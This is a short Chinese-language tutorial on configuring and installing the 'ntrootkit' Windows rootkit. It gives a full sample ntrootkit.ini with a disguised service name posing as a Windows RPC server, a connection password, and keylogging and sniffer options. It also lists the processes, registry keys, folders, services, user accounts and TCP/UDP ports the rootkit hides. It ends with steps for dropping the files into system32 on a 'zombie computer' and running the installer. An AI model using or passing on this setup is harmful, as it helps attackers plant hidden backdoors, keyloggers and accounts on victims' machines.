Rootkit之ntrootkit的配置使用

NTrootkit

一，配置方法

\\filename:ntrootkit.ini

\\This is the init file of yyt_hac's ntrootkit,please modify it correctly or the rootkit

\\can't be installed!!!

[GLOBAL]     //下面為配置内容

\\servicename is the ntrootkit 's servicename

servicename=tsserver       //服務名

servdispname=rpcsvr

servdescription=windows system rpc server

installdir=com\sserver      //安裝目錄

connpass=12345             //連接配接密碼

appname=51cto.exe 

keylog=0                       //0為不記錄鍵盤

workmode=1                  //0為sniffer模式

[HIDDEN PROCNAME]     //要隐藏的服務名

51cto

[HIDDEN REGKEY]    //要隐藏的系統資料庫鍵

zero\soft\...\...\xxx

[HIDDEN REGVALUE]   //要隐藏的系統資料庫鍵值

zero\soft\...\...

[HIDDEN FILEDIR]  //要隐藏的檔案目錄

c:\rootkit

[HIDDEN SERVICE]  //要隐藏的服務名

servicert

[HIDDEN USER]  //要隐藏的使用者名

zerosecurity

[HIDDEN TCPPORT]  //要隐藏的tcp端口

tcpport=5768

[HIDDEN UDPPORT]  //要隐藏的udp端口

udpport=4000

二，使用方法

       ①：将配置檔案 .ini和服務端ntrootkit.exe放入殭屍電腦的 system32目錄下，然後運作ntrootkit.exe安裝；ntrootkit -u password 可解除安裝；